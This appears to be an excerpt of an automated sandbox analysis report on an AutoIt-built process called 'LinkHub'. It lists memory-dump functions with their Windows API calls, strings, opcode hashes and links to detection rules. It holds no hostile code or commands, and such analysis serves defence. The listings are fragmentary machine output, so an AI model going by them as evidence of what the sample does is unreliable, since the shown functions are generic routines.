                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 0d1786f0c4c62b7c33d89406de598b9e4f85b7a462ee846c20bcaed4edee88f9
                                                                    • Instruction ID: 721ca9cc6afebce94e0a62bdc18f3268b4ffa1fd53ef0123f18b872d9e799193
                                                                    • Opcode Fuzzy Hash: 0d1786f0c4c62b7c33d89406de598b9e4f85b7a462ee846c20bcaed4edee88f9
                                                                    • Instruction Fuzzy Hash: EF31F574A0160A9FDB14CFA9D880BEE7BB5FF49300F14406AED08AB395D771A945CFA0
                                                                    Function 00D03C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D03D18
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D03D23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: a87c6375aa2616ba84ef3e90c8e26cbeb196cb0dc49b3d30b0b9e42aca2f98e7
                                                                    • Instruction ID: 31ac026e5e000af424b2b77e41977e1987bab6c10e38ae8ddc2da7a56d7ce670
                                                                    • Opcode Fuzzy Hash: a87c6375aa2616ba84ef3e90c8e26cbeb196cb0dc49b3d30b0b9e42aca2f98e7
                                                                    • Instruction Fuzzy Hash: 3E119D71700208AFEF158E64DC80FEB3BAEEB883A4F144125F919E72D0D6719D519BB0
                                                                    Function 00D041AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C77873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C778B1
                                                                      • Part of subcall function 00C77873: GetStockObject.GDI32(00000011), ref: 00C778C5
                                                                      • Part of subcall function 00C77873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C778CF
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00D04216
                                                                    • GetSysColor.USER32(00000012), ref: 00D04230
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: 8b8e4751f08fa12349a320d4e1d59ab5389b18369c12831cdc321d8673bfa6a8
                                                                    • Instruction ID: 0f221efba52d125c32869086b5e5d835aebea33f0d7d3021c14c03d1e43c268a
                                                                    • Opcode Fuzzy Hash: 8b8e4751f08fa12349a320d4e1d59ab5389b18369c12831cdc321d8673bfa6a8
                                                                    • Instruction Fuzzy Hash: 8B1114B2610209AFDB00DFB8CC45FEA7BA8EB09314F054515F959E3290D675E850DB64
                                                                    Function 00CED763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CED7C2
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CED7EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 89328eb73105837769bc5cba53b248da081bde49a63afc83b4ca0b52964fe54a
                                                                    • Instruction ID: 89aa26cbfac78e4bfdd1d8c298a252fdb0a6a15beac4de1d2dc13f453318bb30
                                                                    • Opcode Fuzzy Hash: 89328eb73105837769bc5cba53b248da081bde49a63afc83b4ca0b52964fe54a
                                                                    • Instruction Fuzzy Hash: C4110272205272BAD7344B638C49EE7BE9DEB127A4F00422AB51A92180D2A48980D2F0
                                                                    Function 00CD75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00CD761D
                                                                    • _wcslen.LIBCMT ref: 00CD7629
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: STOP
                                                                    • API String ID: 1256254125-2411985666
                                                                    • Opcode ID: a18836c211e085e5484a200304437810cd31dd6847c7e873ad1ccfbb6977913c
                                                                    • Instruction ID: 3e53ff1696df223f05bc59356576443c9e9c5e6519fa808bc984b49d74fee863
                                                                    • Opcode Fuzzy Hash: a18836c211e085e5484a200304437810cd31dd6847c7e873ad1ccfbb6977913c
                                                                    • Instruction Fuzzy Hash: D301C032A04A2B8BCB20AEBDCC849BF77B5AF60750B50062AF535D2395FB35DE019650
                                                                    Function 00CD262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CD2699
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: e4d2d059b1a0709165ee39e67a8642de50101fc796a31c5db5534873c29c4e44
                                                                    • Instruction ID: 25fdd44a14d94c5a5e45a3535c114f53c04daf751f4336fb8d41902707c4bee1
                                                                    • Opcode Fuzzy Hash: e4d2d059b1a0709165ee39e67a8642de50101fc796a31c5db5534873c29c4e44
                                                                    • Instruction Fuzzy Hash: 2B01D475640314ABCB08EBA4CC55DFE77A8EFA6350B00461BB932973D1EB31990DD660
                                                                    Function 00CD2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CD2593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 34d1ac7453bb444d2b437ed39fedb128dbf477ca7f438dc278d4189c3b891601
                                                                    • Instruction ID: 93b9114cf0a51ecb0609d9700732646a9deed171323535fba4f9296ed849f185
                                                                    • Opcode Fuzzy Hash: 34d1ac7453bb444d2b437ed39fedb128dbf477ca7f438dc278d4189c3b891601
                                                                    • Instruction Fuzzy Hash: C801A775640104BBCB14EB90D966EFE77A8DF65340F50401B7A16A3381EB21DE0CD7B1
                                                                    Function 00CD25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CD2615
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 0245a28941ebbce93cf535b4a59e73b2e919436ae239470ab198942baeb2b4b6
                                                                    • Instruction ID: b4d1e8f75963edefc7e589aeaea54621a0ed901d44163f0c2bfbc32db068836e
                                                                    • Opcode Fuzzy Hash: 0245a28941ebbce93cf535b4a59e73b2e919436ae239470ab198942baeb2b4b6
                                                                    • Instruction Fuzzy Hash: 0801A2B5A40204ABCB15E7A0D901FFF77A8DF25740F504027BA02A3381EB61CE09E6B1
                                                                    Function 00CD26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00CD2720
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 82f471a69b417dad20fdc7eff65e64b12fa6ca54999faaa04ed86518549cb137
                                                                    • Instruction ID: 1e4138ad74f9e3789866cdf040aef58a6feea4317ac2cad9dec31eabea2dd2d0
                                                                    • Opcode Fuzzy Hash: 82f471a69b417dad20fdc7eff65e64b12fa6ca54999faaa04ed86518549cb137
                                                                    • Instruction Fuzzy Hash: B6F0FF75A40214ABCB28A7A4CC42FFE77A8EF11340F40491BB622A33C1EF61990CD660
                                                                    Function 00CD1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CD146F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 2030045667-4017498283
                                                                    • Opcode ID: ae95eb0a5f850499bf286810021c3c6dc249fb3d6f9fe62b8650114d8da7553e
                                                                    • Instruction ID: 4b2ece97e46e5b33972d21b95bde1ac9ba92780af1f72d5dc56075a591ef5e6a
                                                                    • Opcode Fuzzy Hash: ae95eb0a5f850499bf286810021c3c6dc249fb3d6f9fe62b8650114d8da7553e
                                                                    • Instruction Fuzzy Hash: 20E0D8312843183ED61437D4BC07F8876858F04B55F21841BFB4C645C34EE3245056BD
                                                                    Function 00C910B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C8FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C910E2,?,?,?,00C7100A), ref: 00C8FAD9
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00C7100A), ref: 00C910E6
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C7100A), ref: 00C910F5
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C910F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 55579361-631824599
                                                                    • Opcode ID: fbd3334e631b9fb9a17892af304e7b3f5e80f5b2db97fe3f50166c6f663062bb
                                                                    • Instruction ID: e6420b2eff9b390a3e5c7a83383da80aa7cb69021fd36c9100c2cbd3838970ae
                                                                    • Opcode Fuzzy Hash: fbd3334e631b9fb9a17892af304e7b3f5e80f5b2db97fe3f50166c6f663062bb
                                                                    • Instruction Fuzzy Hash: 62E06D706003119FD720AF75E909346BFE5AB00705F04891DF889C2351DBB4D484DBB1
                                                                    Function 00CE39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00CE39F0
                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CE3A05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: cb12bf8ac206cc920153f0848ebd5e0f1f13e83f10f972b53cbe0951ca151529
                                                                    • Instruction ID: 30a3a121eec19a369a102ad0db8d49d58df2a82b62516182f46578c0373fd813
                                                                    • Opcode Fuzzy Hash: cb12bf8ac206cc920153f0848ebd5e0f1f13e83f10f972b53cbe0951ca151529
                                                                    • Instruction Fuzzy Hash: 3CD05B7150031467DA70A7A49C0DFCB7A6CDB45710F0001917A59D1191DAB0D545C7A4
                                                                    Function 00D02DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D02E08
                                                                    • PostMessageW.USER32(00000000), ref: 00D02E0F
                                                                      • Part of subcall function 00CDF292: Sleep.KERNEL32 ref: 00CDF30A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 0b5e33db271872b2b4d62d867832cacbd6f31b9c299cd1dca0e0942d2d81cb98
                                                                    • Instruction ID: 697e4fea7d3976c7268af6b564f3e9c5fa4b66e3b4a040ab196920ba86a2a710
                                                                    • Opcode Fuzzy Hash: 0b5e33db271872b2b4d62d867832cacbd6f31b9c299cd1dca0e0942d2d81cb98
                                                                    • Instruction Fuzzy Hash: B4D0C9753C53146AF668A7B0AC0FFD67A65AB55B10F604826774AEA2D0C9E0A801C6A4
                                                                    Function 00D02DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D02DC8
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D02DDB
                                                                      • Part of subcall function 00CDF292: Sleep.KERNEL32 ref: 00CDF30A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: e6ed5233bfa37b0781159428a9ae1a91340b170522f50cbd68f1803a09be98b7
                                                                    • Instruction ID: 83a37ea1f7e8f461b2d3ccd053fd9583be3f97864485552d93f5db87071de20b
                                                                    • Opcode Fuzzy Hash: e6ed5233bfa37b0781159428a9ae1a91340b170522f50cbd68f1803a09be98b7
                                                                    • Instruction Fuzzy Hash: 4BD0C975395314AAE668A7B0AC0FFD67A65AB50B10F604826774AAA2D0C9E0A801C6A4
                                                                    Function 00CAC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00CAC213
                                                                    • GetLastError.KERNEL32 ref: 00CAC221
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CAC27C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0
                                                                    • Opcode ID: b19496b142920a75cdd0887cfde3ca5a95e561dfe7d31a0521d7c3093be43388
                                                                    • Instruction ID: 7dfb8cf46c4d29b8ef89df8d775925a9874ffd834004d5457a5c726ab4cd0910
                                                                    • Opcode Fuzzy Hash: b19496b142920a75cdd0887cfde3ca5a95e561dfe7d31a0521d7c3093be43388
                                                                    • Instruction Fuzzy Hash: AC41C931600207EFDF259FE5C884BAA7BA5EF53714F244269F8699B1A1DB308E01D760